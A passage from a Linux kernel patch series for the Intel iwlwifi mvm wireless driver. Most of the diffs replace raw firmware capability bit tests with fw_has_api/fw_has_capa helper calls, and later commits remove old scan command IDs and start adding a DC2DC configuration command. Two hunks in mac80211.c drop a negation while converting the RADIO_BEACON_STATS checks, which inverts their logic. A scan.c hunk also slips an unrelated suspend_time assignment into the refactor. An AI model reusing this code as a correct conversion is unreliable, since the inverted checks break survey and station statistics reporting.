IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_bt_coex_is_tpc_allowed_old(mvm, band); if (band != IEEE80211_BAND_2GHZ) @@ -937,7 +938,8 @@ u8 iwl_mvm_bt_coex_tx_prio(struct iwl_mvm *mvm, struct ieee80211_hdr *hdr, void iwl_mvm_bt_coex_vif_change(struct iwl_mvm *mvm) { - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { + if (!fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { iwl_mvm_bt_coex_vif_change_old(mvm); return; } @@ -955,7 +957,7 @@ int iwl_mvm_rx_ant_coupling_notif(struct iwl_mvm *mvm, u8 __maybe_unused lower_bound, upper_bound; u8 lut; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BT_COEX_SPLIT)) return iwl_mvm_rx_ant_coupling_notif_old(mvm, rxb, dev_cmd); if (!iwl_mvm_bt_is_plcr_supported(mvm)) diff --git a/drivers/net/wireless/iwlwifi/mvm/debugfs.c b/drivers/net/wireless/iwlwifi/mvm/debugfs.c index 8c17b943cc6f..ffb4b5cef275 100644 --- a/drivers/net/wireless/iwlwifi/mvm/debugfs.c +++ b/drivers/net/wireless/iwlwifi/mvm/debugfs.c @@ -493,7 +493,8 @@ static ssize_t iwl_dbgfs_bt_notif_read(struct file *file, char __user *user_buf, mutex_lock(&mvm->mutex); - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { + if (!fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { struct iwl_bt_coex_profile_notif_old *notif = &mvm->last_bt_notif_old; @@ -550,7 +551,8 @@ static ssize_t iwl_dbgfs_bt_cmd_read(struct file *file, char __user *user_buf, mutex_lock(&mvm->mutex); - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { + if (!fw_has_api(&mvm->fw->ucode_capa, + 
IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { struct iwl_bt_coex_ci_cmd_old *cmd = &mvm->last_bt_ci_cmd_old; pos += scnprintf(buf+pos, bufsz-pos, @@ -916,7 +918,8 @@ iwl_dbgfs_scan_ant_rxchain_write(struct iwl_mvm *mvm, char *buf, if (mvm->scan_rx_ant != scan_rx_ant) { mvm->scan_rx_ant = scan_rx_ant; - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_UMAC_SCAN)) iwl_mvm_config_scan(mvm); } diff --git a/drivers/net/wireless/iwlwifi/mvm/fw.c b/drivers/net/wireless/iwlwifi/mvm/fw.c index 2f76fb23249a..eb10c5ee4a14 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw.c +++ b/drivers/net/wireless/iwlwifi/mvm/fw.c @@ -623,7 +623,7 @@ static int iwl_mvm_config_ltr(struct iwl_mvm *mvm) if (!mvm->trans->ltr_enabled) return 0; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_HDC_PHASE_0)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_HDC_PHASE_0)) return iwl_mvm_config_ltr_v1(mvm); return iwl_mvm_send_cmd_pdu(mvm, LTR_CONFIG, 0, @@ -754,7 +754,7 @@ int iwl_mvm_up(struct iwl_mvm *mvm) goto error; } - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) { ret = iwl_mvm_config_scan(mvm); if (ret) goto error; diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index 57d75d14fc80..c46c69f2440f 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -515,7 +515,7 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) BUILD_BUG_ON(IWL_MVM_MAX_UMAC_SCANS > HWEIGHT32(IWL_MVM_SCAN_MASK) || IWL_MVM_MAX_LMAC_SCANS > HWEIGHT32(IWL_MVM_SCAN_MASK)); - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) mvm->max_scans = IWL_MVM_MAX_UMAC_SCANS; else mvm->max_scans = IWL_MVM_MAX_LMAC_SCANS; @@ -527,10 +527,10 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) hw->wiphy->bands[IEEE80211_BAND_5GHZ] = &mvm->nvm_data->bands[IEEE80211_BAND_5GHZ]; - if ((mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_BEAMFORMER) && - (mvm->fw->ucode_capa.api[0] & - IWL_UCODE_TLV_API_LQ_SS_PARAMS)) + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_BEAMFORMER) && + fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_LQ_SS_PARAMS)) hw->wiphy->bands[IEEE80211_BAND_5GHZ]->vht_cap.cap |= IEEE80211_VHT_CAP_SU_BEAMFORMER_CAPABLE; } @@ -556,20 +556,20 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) NL80211_FEATURE_STATIC_SMPS | NL80211_FEATURE_SUPPORTS_WMM_ADMISSION; - if (mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_TXPOWER_INSERTION_SUPPORT) + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_TXPOWER_INSERTION_SUPPORT)) hw->wiphy->features |= NL80211_FEATURE_TX_POWER_INSERTION; - if (mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_QUIET_PERIOD_SUPPORT) + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_QUIET_PERIOD_SUPPORT)) hw->wiphy->features |= NL80211_FEATURE_QUIET; - if (mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_DS_PARAM_SET_IE_SUPPORT) + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_DS_PARAM_SET_IE_SUPPORT)) hw->wiphy->features |= NL80211_FEATURE_DS_PARAM_SET_IE_IN_PROBES; - if (mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_WFA_TPC_REP_IE_SUPPORT) + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_WFA_TPC_REP_IE_SUPPORT)) hw->wiphy->features |= NL80211_FEATURE_WFA_TPC_IE_IN_PROBES; mvm->rts_threshold = 
IEEE80211_MAX_RTS_THRESHOLD; @@ -619,13 +619,14 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) if (ret) return ret; - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_TDLS_SUPPORT) { + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_TDLS_SUPPORT)) { IWL_DEBUG_TDLS(mvm, "TDLS supported\n"); hw->wiphy->flags |= WIPHY_FLAG_SUPPORTS_TDLS; } - if (mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_TDLS_CHANNEL_SWITCH) { + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_TDLS_CHANNEL_SWITCH)) { IWL_DEBUG_TDLS(mvm, "TDLS channel switch supported\n"); hw->wiphy->features |= NL80211_FEATURE_TDLS_CHANNEL_SWITCH; } @@ -1500,7 +1501,7 @@ void __iwl_mvm_mac_stop(struct iwl_mvm *mvm) /* We shouldn't have any UIDs still set. Loop over all the UIDs to * make sure there's nothing left there and warn if any is found. */ - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) { int i; for (i = 0; i < mvm->max_scans; i++) { @@ -1572,7 +1573,7 @@ static int iwl_mvm_set_tx_power(struct iwl_mvm *mvm, struct ieee80211_vif *vif, .pwr_restriction = cpu_to_le16(8 * tx_power), }; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_TX_POWER_DEV)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_TX_POWER_DEV)) return iwl_mvm_set_tx_power_old(mvm, vif, tx_power); if (tx_power == IWL_DEFAULT_MAX_TX_POWER) @@ -3102,8 +3103,8 @@ static int iwl_mvm_roc(struct ieee80211_hw *hw, switch (vif->type) { case NL80211_IFTYPE_STATION: - if (mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_HOTSPOT_SUPPORT) { + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_HOTSPOT_SUPPORT)) { /* Use aux roc framework (HS20) */ ret = iwl_mvm_send_aux_roc_cmd(mvm, channel, vif, duration); @@ -3895,7 +3896,7 @@ static int iwl_mvm_mac_get_survey(struct ieee80211_hw *hw, int idx, if (idx != 0) return -ENOENT; - if (!(mvm->fw->ucode_capa.capa[0] & + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_RADIO_BEACON_STATS)) return -ENOENT; @@ -3942,8 +3943,8 @@ static void iwl_mvm_mac_sta_statistics(struct ieee80211_hw *hw, struct iwl_mvm_vif *mvmvif = iwl_mvm_vif_from_mac80211(vif); struct iwl_mvm_sta *mvmsta = iwl_mvm_sta_from_mac80211(sta); - if (!(mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_RADIO_BEACON_STATS)) + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_RADIO_BEACON_STATS)) return; /* if beacon filtering isn't on mac80211 does it anyway */ diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index 0173ad15ed46..255cde41d8b0 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -889,14 +889,15 @@ static inline bool iwl_mvm_is_d0i3_supported(struct iwl_mvm *mvm) return mvm->trans->cfg->d0i3 && mvm->trans->d0i3_mode != IWL_D0I3_MODE_OFF && !iwlwifi_mod_params.d0i3_disable && - (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_D0I3_SUPPORT); + fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_D0I3_SUPPORT); } static inline bool iwl_mvm_is_lar_supported(struct iwl_mvm *mvm) { bool nvm_lar = mvm->nvm_data->lar_enabled; - bool tlv_lar = mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_LAR_SUPPORT; + bool tlv_lar = fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_LAR_SUPPORT); if (iwlwifi_mod_params.lar_disable) return false; @@ -913,24 +914,28 @@ static inline bool iwl_mvm_is_lar_supported(struct iwl_mvm *mvm) static inline bool iwl_mvm_is_wifi_mcc_supported(struct iwl_mvm *mvm) { - return 
mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_WIFI_MCC_UPDATE || - mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_LAR_MULTI_MCC; + return fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_WIFI_MCC_UPDATE) || + fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_LAR_MULTI_MCC); } static inline bool iwl_mvm_is_scd_cfg_supported(struct iwl_mvm *mvm) { - return mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_SCD_CFG; + return fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_SCD_CFG); } static inline bool iwl_mvm_bt_is_plcr_supported(struct iwl_mvm *mvm) { - return (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_BT_COEX_PLCR) && + return fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_BT_COEX_PLCR) && IWL_MVM_BT_COEX_CORUNNING; } static inline bool iwl_mvm_bt_is_rrc_supported(struct iwl_mvm *mvm) { - return (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_BT_COEX_RRC) && + return fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_BT_COEX_RRC) && IWL_MVM_BT_COEX_RRC; } diff --git a/drivers/net/wireless/iwlwifi/mvm/nvm.c b/drivers/net/wireless/iwlwifi/mvm/nvm.c index 47014241bc3c..2a6be350704a 100644 --- a/drivers/net/wireless/iwlwifi/mvm/nvm.c +++ b/drivers/net/wireless/iwlwifi/mvm/nvm.c @@ -316,8 +316,8 @@ iwl_parse_nvm_sections(struct iwl_mvm *mvm) phy_sku = (const __le16 *)sections[NVM_SECTION_TYPE_PHY_SKU].data; lar_enabled = !iwlwifi_mod_params.lar_disable && - (mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_LAR_SUPPORT); + fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_LAR_SUPPORT); return iwl_parse_nvm_data(mvm->trans->dev, mvm->cfg, hw, sw, calib, regulatory, mac_override, phy_sku, @@ -792,8 +792,8 @@ int iwl_mvm_init_mcc(struct iwl_mvm *mvm) char mcc[3]; if (mvm->cfg->device_family == IWL_DEVICE_FAMILY_8000) { - tlv_lar = mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_LAR_SUPPORT; + tlv_lar = fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_LAR_SUPPORT); nvm_lar = mvm->nvm_data->lar_enabled; if (tlv_lar != nvm_lar) IWL_INFO(mvm, diff --git a/drivers/net/wireless/iwlwifi/mvm/rs.c b/drivers/net/wireless/iwlwifi/mvm/rs.c index ae9965647771..daff1d0a8e4a 100644 --- a/drivers/net/wireless/iwlwifi/mvm/rs.c +++ b/drivers/net/wireless/iwlwifi/mvm/rs.c @@ -1127,8 +1127,8 @@ void iwl_mvm_rs_tx_status(struct iwl_mvm *mvm, struct ieee80211_sta *sta, u32 tx_resp_hwrate = (uintptr_t)info->status.status_driver_data[1]; struct iwl_mvm_sta *mvmsta = iwl_mvm_sta_from_mac80211(sta); struct iwl_lq_sta *lq_sta = &mvmsta->lq_sta; - bool allow_ant_mismatch = mvm->fw->ucode_capa.api[0] & - IWL_UCODE_TLV_API_LQ_SS_PARAMS; + bool allow_ant_mismatch = fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_LQ_SS_PARAMS); /* Treat uninitialized rate scaling data same as non-existing. 
*/ if (!lq_sta) { @@ -2714,7 +2714,7 @@ static void rs_vht_init(struct iwl_mvm *mvm, (vht_cap->cap & IEEE80211_VHT_CAP_RXSTBC_MASK)) lq_sta->stbc_capable = true; - if ((mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_BEAMFORMER) && + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_BEAMFORMER) && (num_of_ant(iwl_mvm_get_valid_tx_ant(mvm)) > 1) && (vht_cap->cap & IEEE80211_VHT_CAP_SU_BEAMFORMEE_CAPABLE)) lq_sta->bfer_capable = true; @@ -2998,7 +2998,7 @@ static void rs_build_rates_table(struct iwl_mvm *mvm, valid_tx_ant = iwl_mvm_get_valid_tx_ant(mvm); /* TODO: remove old API when min FW API hits 14 */ - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_LQ_SS_PARAMS) && + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_LQ_SS_PARAMS) && rs_stbc_allow(mvm, sta, lq_sta)) rate.stbc = true; @@ -3212,7 +3212,7 @@ static void rs_fill_lq_cmd(struct iwl_mvm *mvm, rs_build_rates_table(mvm, sta, lq_sta, initial_rate); - if (mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_LQ_SS_PARAMS) + if (fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_LQ_SS_PARAMS)) rs_set_lq_ss_params(mvm, sta, lq_sta, initial_rate); mvmsta = iwl_mvm_sta_from_mac80211(sta); diff --git a/drivers/net/wireless/iwlwifi/mvm/rx.c b/drivers/net/wireless/iwlwifi/mvm/rx.c index d6314ddf57b5..8f1d93b7a13a 100644 --- a/drivers/net/wireless/iwlwifi/mvm/rx.c +++ b/drivers/net/wireless/iwlwifi/mvm/rx.c @@ -570,7 +570,7 @@ void iwl_mvm_handle_rx_statistics(struct iwl_mvm *mvm, }; u32 temperature; - if (mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_STATS_V10) { + if (fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_STATS_V10)) { struct iwl_notif_statistics_v10 *stats = (void *)&pkt->data; if (iwl_rx_packet_payload_len(pkt) != v10_len) @@ -610,7 +610,7 @@ void iwl_mvm_handle_rx_statistics(struct iwl_mvm *mvm, /* Only handle rx statistics temperature changes if async temp * notifications are not supported */ - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_ASYNC_DTM)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_ASYNC_DTM)) iwl_mvm_tt_temp_changed(mvm, temperature); ieee80211_iterate_active_interfaces(mvm->hw, diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 794109e617a1..5de144968723 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -160,7 +160,7 @@ iwl_mvm_scan_rate_n_flags(struct iwl_mvm *mvm, enum ieee80211_band band, static u16 iwl_mvm_get_active_dwell(struct iwl_mvm *mvm, enum ieee80211_band band, int n_ssids) { - if (mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BASIC_DWELL) + if (fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BASIC_DWELL)) return 10; if (band == IEEE80211_BAND_2GHZ) return 20 + 3 * (n_ssids + 1); @@ -170,7 +170,7 @@ static u16 iwl_mvm_get_active_dwell(struct iwl_mvm *mvm, static u16 iwl_mvm_get_passive_dwell(struct iwl_mvm *mvm, enum ieee80211_band band) { - if (mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BASIC_DWELL) + if (fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BASIC_DWELL)) return 110; return band == IEEE80211_BAND_2GHZ ? 
100 + 20 : 100 + 10; } @@ -205,8 +205,9 @@ static void iwl_mvm_scan_calc_dwell(struct iwl_mvm *mvm, params->max_out_time = 120; if (iwl_mvm_low_latency(mvm)) { - if (mvm->fw->ucode_capa.api[0] & - IWL_UCODE_TLV_API_FRAGMENTED_SCAN) { + if (fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_FRAGMENTED_SCAN)) { + params->suspend_time = 105; /* * If there is more than one active interface make @@ -220,8 +221,9 @@ static void iwl_mvm_scan_calc_dwell(struct iwl_mvm *mvm, } } - if (frag_passive_dwell && (mvm->fw->ucode_capa.api[0] & - IWL_UCODE_TLV_API_FRAGMENTED_SCAN)) { + if (frag_passive_dwell && + fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_FRAGMENTED_SCAN)) { /* * P2P device scan should not be fragmented to avoid negative * impact on P2P device discovery. Configure max_out_time to be @@ -273,8 +275,8 @@ static void iwl_mvm_scan_calc_dwell(struct iwl_mvm *mvm, static inline bool iwl_mvm_rrm_scan_needed(struct iwl_mvm *mvm) { /* require rrm scan whenever the fw supports it */ - return mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_DS_PARAM_SET_IE_SUPPORT; + return fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_DS_PARAM_SET_IE_SUPPORT); } static int iwl_mvm_max_scan_ie_fw_cmd_room(struct iwl_mvm *mvm) @@ -732,7 +734,8 @@ iwl_mvm_build_scan_probe(struct iwl_mvm *mvm, struct ieee80211_vif *vif, static __le32 iwl_mvm_scan_priority(struct iwl_mvm *mvm, enum iwl_scan_priority_ext prio) { - if (mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_EXT_SCAN_PRIORITY) + if (fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_EXT_SCAN_PRIORITY)) return cpu_to_le32(prio); if (prio <= IWL_SCAN_PRIORITY_EXT_2) @@ -785,7 +788,7 @@ static inline bool iwl_mvm_scan_use_ebs(struct iwl_mvm *mvm, return ((capa->flags & IWL_UCODE_TLV_FLAGS_EBS_SUPPORT) && mvm->last_ebs_successful && (n_iterations > 1 || - (capa->api[0] & IWL_UCODE_TLV_API_SINGLE_SCAN_EBS)) && + fw_has_api(capa, IWL_UCODE_TLV_API_SINGLE_SCAN_EBS)) && vif->type != NL80211_IFTYPE_P2P_DEVICE); } @@ -1233,7 +1236,7 @@ int iwl_mvm_reg_scan_start(struct iwl_mvm *mvm, struct ieee80211_vif *vif, iwl_mvm_build_scan_probe(mvm, vif, ies, &params); - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) { hcmd.id = SCAN_REQ_UMAC; ret = iwl_mvm_scan_umac(mvm, vif, &params, IWL_MVM_SCAN_REGULAR); @@ -1341,7 +1344,7 @@ int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm, iwl_mvm_build_scan_probe(mvm, vif, ies, &params); - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) { hcmd.id = SCAN_REQ_UMAC; ret = iwl_mvm_scan_umac(mvm, vif, &params, IWL_MVM_SCAN_SCHED); } else { @@ -1468,7 +1471,7 @@ static int iwl_mvm_scan_stop_wait(struct iwl_mvm *mvm, int type) IWL_DEBUG_SCAN(mvm, "Preparing to stop scan, type %x\n", type); - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) ret = iwl_mvm_umac_scan_abort(mvm, type); else ret = iwl_mvm_lmac_scan_abort(mvm); @@ -1486,7 +1489,7 @@ static int iwl_mvm_scan_stop_wait(struct iwl_mvm *mvm, int type) int iwl_mvm_scan_size(struct iwl_mvm *mvm) { - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) return sizeof(struct iwl_scan_req_umac) + sizeof(struct iwl_scan_channel_cfg_umac) * mvm->fw->ucode_capa.n_scan_channels + @@ -1504,7 +1507,7 @@ int iwl_mvm_scan_size(struct iwl_mvm *mvm) */ void 
iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm) { - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) { int uid, i; uid = iwl_mvm_scan_uid_by_status(mvm, IWL_MVM_SCAN_REGULAR); diff --git a/drivers/net/wireless/iwlwifi/mvm/tx.c b/drivers/net/wireless/iwlwifi/mvm/tx.c index 57e0cbb35f37..7ba7a118ff5c 100644 --- a/drivers/net/wireless/iwlwifi/mvm/tx.c +++ b/drivers/net/wireless/iwlwifi/mvm/tx.c @@ -171,8 +171,8 @@ void iwl_mvm_set_tx_cmd(struct iwl_mvm *mvm, struct sk_buff *skb, !is_multicast_ether_addr(ieee80211_get_DA(hdr))) tx_flags |= TX_CMD_FLG_PROT_REQUIRE; - if ((mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_TXPOWER_INSERTION_SUPPORT) && + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_TXPOWER_INSERTION_SUPPORT) && ieee80211_action_contains_tpc(skb)) tx_flags |= TX_CMD_FLG_WRITE_TX_POWER; diff --git a/drivers/net/wireless/iwlwifi/mvm/utils.c b/drivers/net/wireless/iwlwifi/mvm/utils.c index bc55a8b82db6..03f8e06dded7 100644 --- a/drivers/net/wireless/iwlwifi/mvm/utils.c +++ b/drivers/net/wireless/iwlwifi/mvm/utils.c @@ -584,7 +584,7 @@ void iwl_mvm_dump_nic_error_log(struct iwl_mvm *mvm) struct iwl_error_event_table table; u32 base; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_NEW_VERSION)) { + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_NEW_VERSION)) { iwl_mvm_dump_nic_error_log_old(mvm); return; } From 2b4737dd8176f3d384cb9f77353ffdf6de665d3c Mon Sep 17 00:00:00 2001 From: Matti Gottlieb Date: Sun, 31 May 2015 11:29:52 +0300 Subject: [PATCH 633/872] iwlwifi: mvm: Remove old scan commands The firmwares that used these commands are not supported anymore. Remove them. Signed-off-by: Matti Gottlieb Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/fw-api.h | 7 ------- drivers/net/wireless/iwlwifi/mvm/ops.c | 5 ----- 2 files changed, 12 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/fw-api.h b/drivers/net/wireless/iwlwifi/mvm/fw-api.h index 0ed7675eff31..7128379fb621 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw-api.h +++ b/drivers/net/wireless/iwlwifi/mvm/fw-api.h @@ -171,13 +171,6 @@ enum { /* Thermal Throttling*/ REPLY_THERMAL_MNG_BACKOFF = 0x7e, - /* Scanning */ - SCAN_REQUEST_CMD = 0x80, - SCAN_ABORT_CMD = 0x81, - SCAN_START_NOTIFICATION = 0x82, - SCAN_RESULTS_NOTIFICATION = 0x83, - SCAN_COMPLETE_NOTIFICATION = 0x84, - /* NVM */ NVM_ACCESS_CMD = 0x88, diff --git a/drivers/net/wireless/iwlwifi/mvm/ops.c b/drivers/net/wireless/iwlwifi/mvm/ops.c index 91ca626704e3..2801f97990e6 100644 --- a/drivers/net/wireless/iwlwifi/mvm/ops.c +++ b/drivers/net/wireless/iwlwifi/mvm/ops.c @@ -281,11 +281,6 @@ static const char *const iwl_mvm_cmd_strings[REPLY_MAX] = { CMD(BINDING_CONTEXT_CMD), CMD(TIME_QUOTA_CMD), CMD(NON_QOS_TX_COUNTER_CMD), - CMD(SCAN_REQUEST_CMD), - CMD(SCAN_ABORT_CMD), - CMD(SCAN_START_NOTIFICATION), - CMD(SCAN_RESULTS_NOTIFICATION), - CMD(SCAN_COMPLETE_NOTIFICATION), CMD(NVM_ACCESS_CMD), CMD(PHY_CONFIGURATION_CMD), CMD(CALIB_RES_NOTIF_PHY_DB), From 0becb377805c4d060da895e0ce214cee619f1d76 Mon Sep 17 00:00:00 2001 From: Matti Gottlieb Date: Sun, 31 May 2015 09:18:30 +0300 Subject: [PATCH 634/872] iwlwifi: mvm: Add DC2DC_CONFIG_CMD (0x83) cmd & TLV Add DC2DC_CONFIG_CMD (0x83) cmd. Add IWL_UCODE_TLV_CAPA_DC2DC_CONFIG_SUPPORT tlv. The command allows the driver to get & set the DCDC's frequency tune. 
(freq_tune is the divider that is used to calculate the actual DCDC's clock rate) The command always returns the current/updated frequency tune values of the DCDC. Signed-off-by: Matti Gottlieb Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-fw-file.h | 2 + drivers/net/wireless/iwlwifi/mvm/fw-api.h | 46 ++++++++++++++++++++++ drivers/net/wireless/iwlwifi/mvm/ops.c | 1 + 3 files changed, 49 insertions(+) diff --git a/drivers/net/wireless/iwlwifi/iwl-fw-file.h b/drivers/net/wireless/iwlwifi/iwl-fw-file.h index 7efd62908e61..a9b5ae4ebec0 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw-file.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw-file.h @@ -297,6 +297,7 @@ typedef unsigned int __bitwise__ iwl_ucode_tlv_capa_t; * which also implies support for the scheduler configuration command * @IWL_UCODE_TLV_CAPA_TDLS_CHANNEL_SWITCH: supports TDLS channel switching * @IWL_UCODE_TLV_CAPA_HOTSPOT_SUPPORT: supports Hot Spot Command + * @IWL_UCODE_TLV_CAPA_DC2DC_SUPPORT: supports DC2DC Command * @IWL_UCODE_TLV_CAPA_RADIO_BEACON_STATS: support radio and beacon statistics * @IWL_UCODE_TLV_CAPA_BT_COEX_PLCR: enabled BT Coex packet level co-running * @IWL_UCODE_TLV_CAPA_LAR_MULTI_MCC: ucode supports LAR updates with different @@ 